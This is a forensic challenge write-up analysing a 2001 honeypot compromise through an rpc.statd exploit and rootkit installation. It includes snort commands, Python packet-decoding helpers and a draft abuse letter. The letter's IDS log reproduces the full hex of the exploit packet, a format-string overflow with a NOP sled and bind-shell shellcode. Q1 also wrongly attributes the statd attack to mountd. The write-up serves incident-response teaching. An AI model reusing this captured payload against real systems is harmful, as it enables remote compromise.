SCAN 19
Submitted by: Rohit Nand, CISSP (rohitnand@yahoo.com)

The Analysis:

Download the file via wget and confirm the MD5 checksum.
Once we have downloaded and confirmed the integrity of the file, we can begin analysis. We prefer to first extract data from the binary file, as this makes the data analysis easier. We extract two forms of data. First, we extract all the packets to and from the system 192.168.1.102; this gives us easy access to all the traffic involving the compromised system. Second, we extract all the ASCII information from the binary log file, including activity such as telnet, ftp and http sessions; this makes it easier to pull out any cleartext activity of the attacker. At times we will still want to reference the actual binary log file, but this data extraction makes some of the analysis easier.

Packet extraction
snort -vdr newdat3.log host 192.168.1.102 > snort.txt

ASCII cleartext extraction
mkdir log
snort -dr newdat3.log -c snort.conf -l ./log

1.Which vulnerability did the intruder exploit?
The intruder at 210.114.220.46 first probed TCP port 111 (portmapper), and then an rpc.statd buffer-overflow attack was launched against the mountd service. We conclude this from seeing the attacker's subsequent connection to the system on port 919.
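To make the extraction step and the reasoning for Q1 reproducible without Ethereal, here is an added Python example (not part of the original submission) that parses the text format of snort.txt as quoted in the notification letter below, decodes the SunRPC headers, and pairs the portmapper GETPORT lookup for program 100024 (rpc.statd) with the port the victim answered with (919), which is where the port 919 traffic came from. The sample dump is the GETPORT exchange from the capture with the Len and separator lines trimmed; the function names are my own.

```python
import re
import struct
# Sample in the format of the snort -vd output quoted in the letter below: the portmapper
# GETPORT request and reply from the capture (Len/separator lines trimmed).
SAMPLE_DUMP = """\
09/15-22:06:06.819252 210.114.220.46:653 -> 192.168.1.102:111
UDP TTL:47 TOS:0x0 ID:41887 IpLen:20 DgmLen:84
50 54 6F BC 00 00 00 00 00 00 00 02 00 01 86 A0  PTo.............
00 00 00 02 00 00 00 03 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 01 86 B8 00 00 00 01  ................
00 00 00 11 00 00 00 00                          ........

09/15-22:06:07.363739 192.168.1.102:111 -> 210.114.220.46:653
UDP TTL:64 TOS:0x0 ID:1480 IpLen:20 DgmLen:56
50 54 6F BC 00 00 00 01 00 00 00 00 00 00 00 00  PTo.............
00 00 00 00 00 00 00 00 00 00 03 97              ............
"""

def parse_snort_dump(text):  # -> [(src, sport, dst, dport, payload), ...]
    hdr = re.compile(r"^\S+ (\d+\.\d+\.\d+\.\d+):(\d+) -> (\d+\.\d+\.\d+\.\d+):(\d+)$")
    packets = []
    for line in text.splitlines():
        if m := hdr.match(line):
            packets.append([m[1], int(m[2]), m[3], int(m[4]), bytearray()])
        elif packets and (h := re.match(r"^((?:[0-9A-F]{2} ){1,16})", line)):  # hex column only
            packets[-1][4] += bytes.fromhex(h[1])
    return [(s, sp, d, dp, bytes(b)) for s, sp, d, dp, b in packets]

def decode_rpc(payload):
    """Decode a SunRPC v2 message header; opaque cred/verf bodies are skipped (XDR pads to 4)."""
    xid, mtype = struct.unpack("!II", payload[:8])
    if mtype == 0:  # CALL: rpcvers, prog, vers, proc, cred, verf, then procedure arguments
        _rpcvers, prog, vers, proc = struct.unpack("!IIII", payload[8:24])
        off = 24
        for _ in range(2):  # credentials, then verifier: flavor(4) + length(4) + padded body
            off += 8 + ((struct.unpack("!I", payload[off + 4:off + 8])[0] + 3) & ~3)
        return {"xid": xid, "type": "CALL", "prog": prog, "vers": vers, "proc": proc, "args": payload[off:]}
    _reply_stat, _vflavor, vlen = struct.unpack("!III", payload[8:20])  # REPLY (MSG_ACCEPTED)
    off = 20 + ((vlen + 3) & ~3)
    return {"xid": xid, "type": "REPLY", "accept_stat": struct.unpack("!I", payload[off:off + 4])[0], "result": payload[off + 4:]}

def portmapper_lookups(text):
    """Pair PMAPPROC_GETPORT requests with their replies by XID: {xid: (program asked for, port)}."""
    asked, found = {}, {}
    for _src, _sport, _dst, _dport, payload in parse_snort_dump(text):
        r = decode_rpc(payload)
        if r["type"] == "CALL" and (r["prog"], r["proc"]) == (100000, 3):  # portmapper GETPORT
            asked[r["xid"]] = struct.unpack("!I", r["args"][:4])[0]  # 100024 = rpc.statd
        elif r["type"] == "REPLY" and r["xid"] in asked and r["accept_stat"] == 0:
            found[r["xid"]] = (asked[r["xid"]], struct.unpack("!I", r["result"][:4])[0])
    return found
```

Run against the full snort.txt, the same pairing shows which program the attacker asked the portmapper about immediately before the port 919 traffic began.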

2.What ways, and in what order, did the intruder use to connect and run commands on the system?
The attacker connected to the system via VPN (IPSec/ISAKMP), telnet and ssh, in that order.
- We can infer the VPN connection from the connections on port 500 and from viewing the data in Ethereal, which shows ISAKMP exchanges.
- The rootkit installs SSH on port 24. We can confirm this by viewing the port 24 connections in Ethereal and doing a "Follow TCP Stream" on them.

3.How did the intruder try to hide his edits from the MAC times?
As part of the rootkit install, a logcleaner runs and cleans the system log files such as boot.log, cron, messages, spooler, netconf.log and maillog to hide the entries that could be used to trace him.

4.The intruder downloaded rootkits, what were they called? Are they new/custom rootkits?
The intruder downloaded 3 files: Zer0.tar.gz, copy.tar.gz and ooty.tar.gz.
These are custom rootkits based on t0rn and Adore.

5.Recover (tell how you did it too) the rootkits from the snort binary capture
Open the snort binary capture in Ethereal. Right-click on an ftp-data packet and choose "Follow TCP Stream", then "Save As" in ASCII mode to a file.
Using this method, all three of the above-mentioned files were recovered. The names and file sizes were verified against the information in snort.txt that we obtained when analyzing the binary with Snort.
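Here is an added Python example (not part of the original submission) that does what the "Follow TCP Stream" step does for the ftp-data connection: it orders the captured segments by sequence number, tolerates retransmissions and overlaps, reports any hole that would corrupt the recovered file, and returns the size and MD5 to check against the lengths in snort.txt. The segments are constructed, not taken from the real capture, and the function names are my own.

```python
import hashlib

# Constructed ftp-data segments, (relative seq, payload), in the order a capture might
# hold them: out of order, one retransmission and one overlapping segment. Not real data.
SEGMENTS = [
    (1, b"constructed: "),        # seq 1..13 (seq is relative to the ISN)
    (22, b"this is "),            # seq 22..29, captured before the bytes that precede it
    (14, b"pretend "),            # seq 14..21
    (14, b"pretend "),            # retransmission of 14..21, identical bytes
    (27, b"is Zer0.tar.gz"),      # overlaps 27..29, then adds 30..40
]

def reassemble(segments, isn=0):
    """Rebuild one direction of a TCP stream, the way "Follow TCP Stream" does, from
    (seq, payload) segments. Returns (data, gaps): data is the contiguous stream from
    isn+1 up to the first hole; gaps lists (first, last) seq ranges never captured."""
    stream = {}
    for seq, payload in segments:
        for i, b in enumerate(payload):
            if stream.setdefault(seq + i, b) != b:  # a retransmission must agree with what we saw
                raise ValueError(f"conflicting byte at seq {seq + i}")
    if not stream:
        return b"", []
    data, gaps, pos, last = bytearray(), [], isn + 1, max(stream)
    while pos <= last:
        if pos in stream:
            if not gaps:  # only bytes before the first hole are trustworthy file content
                data.append(stream[pos])
            pos += 1
        else:
            start = pos
            while pos <= last and pos not in stream:
                pos += 1
            gaps.append((start, pos - 1))
    return bytes(data), gaps

def recover_file(segments, isn=0):
    """Size and MD5 to compare with the lengths seen in snort.txt (and any known-bad hashes)."""
    data, gaps = reassemble(segments, isn)
    return {"size": len(data), "md5": hashlib.md5(data).hexdigest(), "gaps": gaps, "data": data}
```

A non-empty gaps list means the capture missed packets of the transfer, so the recovered file is truncated even if Ethereal saves it without complaint.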

6.What does the rootkit do to hide the presence of the attacker on the system?
Adore is a Linux LKM-based rootkit. It features smart PROMISC flag hiding, persistent file and directory hiding (still hidden after reboot), process hiding, netstat hiding and a rootshell backdoor.
In our case, the intruder runs SSH on port 24 and hides the process using Adore.
Files and directories such as /usr/X11R6/bin/., /usr/info/.t0rn, /dev/rd/sdc0, /dev/rd/nscd.init, /etc/rc.d/rc3.d/S50inet and /usr/X11R6/lib/X11/.~ are also hidden.

7.What did you learn from this exercise?
- Unnecessary services should be removed from the system.
- OS and application patches should be applied regularly.
- File integrity checkers can be useful tools for system administrators.
- Rootkits can hide processes, files, directories and even connections.
- chkrootkit and kstat are useful tools for detecting LKM rootkits.

8.How long did this challenge take you?
About 7 hours in total.

Bonus Questions:
Based on this challenge, write an example letter of notification to the owner of the source that attacked the system. Include any evidence or logs that you feel are important.

Hello,
On Sat 15 Sep 2001 at 22:06 (local time) we detected an attack on a host on our network (internal IP address 192.168.1.102). This incident appears to have originated from 210.114.220.46. Either a third party has compromised 210.114.220.46 and is now using it to attack other sites, or legitimate users of 210.114.220.46 are engaging in practices that are not condoned under most company or ISP acceptable use policies. Sample IDS logs are presented here:
___________________________________________________________________________________________________________________________________________
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/15-22:06:06.819252 210.114.220.46:653 -> 192.168.1.102:111
UDP TTL:47 TOS:0x0 ID:41887 IpLen:20 DgmLen:84
Len: 64
50 54 6F BC 00 00 00 00 00 00 00 02 00 01 86 A0  PTo.............
00 00 00 02 00 00 00 03 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 01 86 B8 00 00 00 01  ................
00 00 00 11 00 00 00 00                          ........

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/15-22:06:07.363739 192.168.1.102:111 -> 210.114.220.46:653
UDP TTL:64 TOS:0x0 ID:1480 IpLen:20 DgmLen:56
Len: 36
50 54 6F BC 00 00 00 01 00 00 00 00 00 00 00 00  PTo.............
00 00 00 00 00 00 00 00 00 00 03 97              ............

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/15-22:06:07.719989 210.114.220.46:654 -> 192.168.1.102:919
UDP TTL:47 TOS:0x0 ID:41890 IpLen:20 DgmLen:1104
Len: 1084
1B 6D E4 F6 00 00 00 00 00 00 00 02 00 01 86 B8  .m..............
00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 20  ...............
3B A4 92 6E 00 00 00 09 6C 6F 63 61 6C 68 6F 73  ;..n....localhos
74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  t...............
00 00 00 00 00 00 00 00 00 00 03 E7 18 F7 FF BF  ................
18 F7 FF BF 1A F7 FF BF 1A F7 FF BF 25 38 78 25  ............%8x%
38 78 25 38 78 25 38 78 25 38 78 25 38 78 25 38  8x%8x%8x%8x%8x%8
78 25 38 78 25 38 78 25 36 32 37 31 36 78 25 68  x%8x%8x%62716x%h
6E 25 35 31 38 35 39 78 25 68 6E 90 90 90 90 90  n%51859x%hn.....
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 31 C0  ..............1.
EB 7C 59 89 41 10 89 41 08 FE C0 89 41 04 89 C3  .|Y.A..A....A...
FE C0 89 01 B0 66 CD 80 B3 02 89 59 0C C6 41 0E  .....f.....Y..A.
99 C6 41 08 10 89 49 04 80 41 04 0C 88 01 B0 66  ..A...I..A.....f
CD 80 B3 04 B0 66 CD 80 B3 05 30 C0 88 41 04 B0  .....f....0..A..
66 CD 80 89 CE 88 C3 31 C9 B0 3F CD 80 FE C1 B0  f......1..?.....
3F CD 80 FE C1 B0 3F CD 80 C7 06 2F 62 69 6E C7  ?.....?..../bin.
46 04 2F 73 68 41 30 C0 88 46 07 89 76 0C 8D 56  F./shA0..F..v..V
10 8D 4E 0C 89 F3 B0 0B CD 80 B0 01 CD 80 E8 7F  ..N.............
FF FF FF 00                                      ....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/15-22:06:09.131731 192.168.1.102:919 -> 210.114.220.46:654
UDP TTL:64 TOS:0x0 ID:1482 IpLen:20 DgmLen:60
Len: 40
1B 6D E4 F6 00 00 00 01 00 00 00 00 00 00 00 00  .m..............
00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 07  ................

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/15-22:06:09.472194 210.114.220.46:3002 -> 192.168.1.102:111
TCP TTL:47 TOS:0x0 ID:42608 IpLen:20 DgmLen:52 DF
***A***F Seq: 0x18DB659B  Ack: 0xC60CBD63  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 41187351 23102373

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
___________________________________________________________________________________________________________________________________________

Source: 210.114.220.46
Ports: udp-111, udp-919
Incident type: Buffer Overflow attack
Timezone: mention tz here

Attacking host information, as found from www.apnic.net and www.nic.co.kr, is as follows:
Ctrl-C and Ctrl-V here information from www.nic.co.kr

Please take appropriate action and let us know the outcome. Should we come across another such incident from your IP address block, we will be forced to report it to the concerned authorities.